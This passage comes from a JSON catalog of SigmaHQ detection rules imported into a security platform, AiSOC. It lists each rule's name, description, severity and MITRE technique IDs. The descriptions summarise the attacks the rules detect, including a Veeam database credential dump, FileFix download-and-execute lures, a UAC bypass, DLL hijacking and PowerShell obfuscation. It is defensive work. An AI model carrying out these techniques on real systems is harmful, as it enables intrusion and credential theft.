"b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml" } }, { "id": "sigmahq-sigma-b55d23e5-6821-44ff-8a6e-67218891e49f", "type": "detection", "name": "HybridConnectionManager Service Running", "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hybridconnectionmanager-service-running.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" } }, { "id": "sigmahq-sigma-b5746143-59d6-4603-8d06-acbd60e166ee", "type": "detection", "name": "Uncommon Child Process Of AddinUtil.EXE", "description": "Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-addinutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5746143-59d6-4603-8d06-acbd60e166ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-b57ba453-b384-4ab9-9f40-1038086b4e53", "type": "detection", "name": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", "description": "Detects dump of credentials in VeeamBackup dbo", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/veeambackup-database-credentials-dump-via-sqlcmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" } }, { "id": "sigmahq-sigma-b593fd50-7335-4682-a36c-4edcb68e4641", "type": "detection", "name": "Monero Crypto Coin Mining Pool Lookup", "description": "Detects suspicious DNS queries to Monero mining pools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1496", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/network/monero-crypto-coin-mining-pool-lookup.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b593fd50-7335-4682-a36c-4edcb68e4641", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" } }, { "id": "sigmahq-sigma-b59c98c6-95e8-4d65-93ee-f594dfb96b17", "type": "detection", "name": "F5 BIG-IP iControl Rest API Command Execution - Proxy", "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/f5-big-ip-icontrol-rest-api-command-execution-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b59c98c6-95e8-4d65-93ee-f594dfb96b17", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml" } }, { "id": "sigmahq-sigma-b5aa7d60-c17e-4538-97de-09029d6cd76b", "type": "detection", "name": "Suspicious Digital Signature Of AppX Package", "description": "Detects execution of AppX packages with known suspicious or malicious signature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-digital-signature-of-appx-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml" } }, { "id": "sigmahq-sigma-b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2", "type": "detection", "name": "Suspicious FileFix Execution Pattern", "description": "Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.\nThis attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,\nwhich may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.\nThe clipboard content usually contains commands that download and execute malware, such as information stealing tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-filefix-execution-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_filefix_execution_pattern.yml" } }, { "id": "sigmahq-sigma-b5b78988-486d-4a80-b991-930eff3ff8bf", "type": "detection", "name": "PowerShell Profile Modification", "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-profile-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" } }, { "id": "sigmahq-sigma-b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "type": "detection", "name": "Potential Binary Proxy Execution Via Cdb.EXE", "description": "Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1218", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-proxy-execution-via-cdb-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-b5de0c9a-6f19-43e0-af4e-55ad01f550af", "type": "detection", "name": "Unsigned DLL Loaded by Windows Utility", "description": "Detects windows utilities loading an unsigned or untrusted DLL.\nAdversaries often abuse those programs to proxy execution of malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-dll-loaded-by-windows-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5de0c9a-6f19-43e0-af4e-55ad01f550af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_unsigned_dll.yml" } }, { "id": "sigmahq-sigma-b5de2919-b74a-4805-91a7-5049accbaefe", "type": "detection", "name": "Download From Suspicious TLD - Whitelist", "description": "Detects executable downloads from suspicious remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1203", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-tld-whitelist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5de2919-b74a-4805-91a7-5049accbaefe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml" } }, { "id": "sigmahq-sigma-b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "type": "detection", "name": "Potential Goopdate.DLL Sideloading", "description": "Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-goopdate-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_goopdate.yml" } }, { "id": "sigmahq-sigma-b61e87c0-50db-4b2e-8986-6a2be94b33b0", "type": "detection", "name": "Directory Service Restore Mode(DSRM) Registry Value Tampering", "description": "Detects changes to \"DsrmAdminLogonBehavior\" registry value.\nDuring a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an \u201cAdministrator\u201d account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\nAttackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directory-service-restore-mode-dsrm-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b61e87c0-50db-4b2e-8986-6a2be94b33b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml" } }, { "id": "sigmahq-sigma-b640c0b8-87f8-4daa-aef8-95a24261dd1d", "type": "detection", "name": "MITRE BZAR Indicators for Execution", "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1053.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mitre-bzar-indicators-for-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" } }, { "id": "sigmahq-sigma-b6457d63-d2a2-4e29-859d-4e7affc153d1", "type": "detection", "name": "Potential Discovery Activity Via Dnscmd.EXE", "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-via-dnscmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" } }, { "id": "sigmahq-sigma-b64a026b-8deb-4c1d-92fd-98893209dff1", "type": "detection", "name": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/running-chrome-vpn-extensions-via-the-registry-2-vpn-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_chrome_extension.yml" } }, { "id": "sigmahq-sigma-b655a06a-31c0-477a-95c2-3726b83d649d", "type": "detection", "name": "Suspicious Userinit Child Process", "description": "Detects a suspicious child process of userinit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-userinit-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b655a06a-31c0-477a-95c2-3726b83d649d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" } }, { "id": "sigmahq-sigma-b66474aa-bd92-4333-a16c-298155b120df", "type": "detection", "name": "Potential Persistence Via Powershell Search Order Hijacking - Task", "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-powershell-search-order-hijacking-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b66474aa-bd92-4333-a16c-298155b120df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml" } }, { "id": "sigmahq-sigma-b6676963-0353-4f88-90f5-36c20d443c6a", "type": "detection", "name": "Cscript/Wscript Potentially Suspicious Child Process", "description": "Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\nMalware such as Pikabot and Qakbot were seen using similar techniques as well as many others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cscript-wscript-potentially-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6676963-0353-4f88-90f5-36c20d443c6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-b697e69c-746f-4a86-9f59-7bfff8eab881", "type": "detection", "name": "UAC Bypass Using Disk Cleanup", "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-disk-cleanup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" } }, { "id": "sigmahq-sigma-b69888d4-380c-45ce-9cf9-d9ce46e67821", "type": "detection", "name": "Hidden Executable In NTFS Alternate Data Stream", "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-executable-in-ntfs-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" } }, { "id": "sigmahq-sigma-b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "type": "detection", "name": "Potential PowerShell Obfuscation Via Reversed Commands", "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-via-reversed-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" } }, { "id": "sigmahq-sigma-b6c718dd-8f53-4b9f-98d8-93fdca966969", "type": "detection", "name": "New Okta User Created", "description": "Detects new user account creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-okta-user-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6c718dd-8f53-4b9f-98d8-93fdca966969", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_created.yml" } }, { "id": "sigmahq-sigma-b6d235fc-1d38-4b12-adbe-325f06728f37", "type": "detection", "name": "CMSTP Execution Registry Event", "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-registry-event.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6d235fc-1d38-4b12-adbe-325f06728f37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" } }, { "id": "sigmahq-sigma-b6d98a4f-cef0-4abf-bbf6-24132854a83d", "type": "detection", "name": "Remote Access Tool - GoToAssist Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-gotoassist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml" } }, { "id": "sigmahq-sigma-b6e04788-29e1-4557-bb14-77f761848ab8", "type": "detection", "name": "Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE", "description": "Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-download-from-file-sharing-domain-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6e04788-29e1-4557-bb14-77f761848ab8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-b6e2a2e3-2d30-43b1-a4ea-071e36595690", "type": "detection", "name": "Space After Filename - macOS", "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/space-after-filename-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" } }, { "id": "sigmahq-sigma-b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "type": "detection", "name": "Remote Server Service Abuse", "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-server-service-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" } }, { "id": "sigmahq-sigma-b6f91281-20aa-446a-b986-38a92813a18f", "type": "detection", "name": "DLL Search Order Hijackig Via Additional Space in Path", "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-search-order-hijackig-via-additional-space-in-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6f91281-20aa-446a-b986-38a92813a18f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" } }, { "id": "sigmahq-sigma-b7216a7d-687e-4c8d-82b1-3080b2ad961f", "type": "detection", "name": "Modify Group Policy Settings - ScriptBlockLogging", "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-group-policy-settings-scriptblocklogging.yaml", 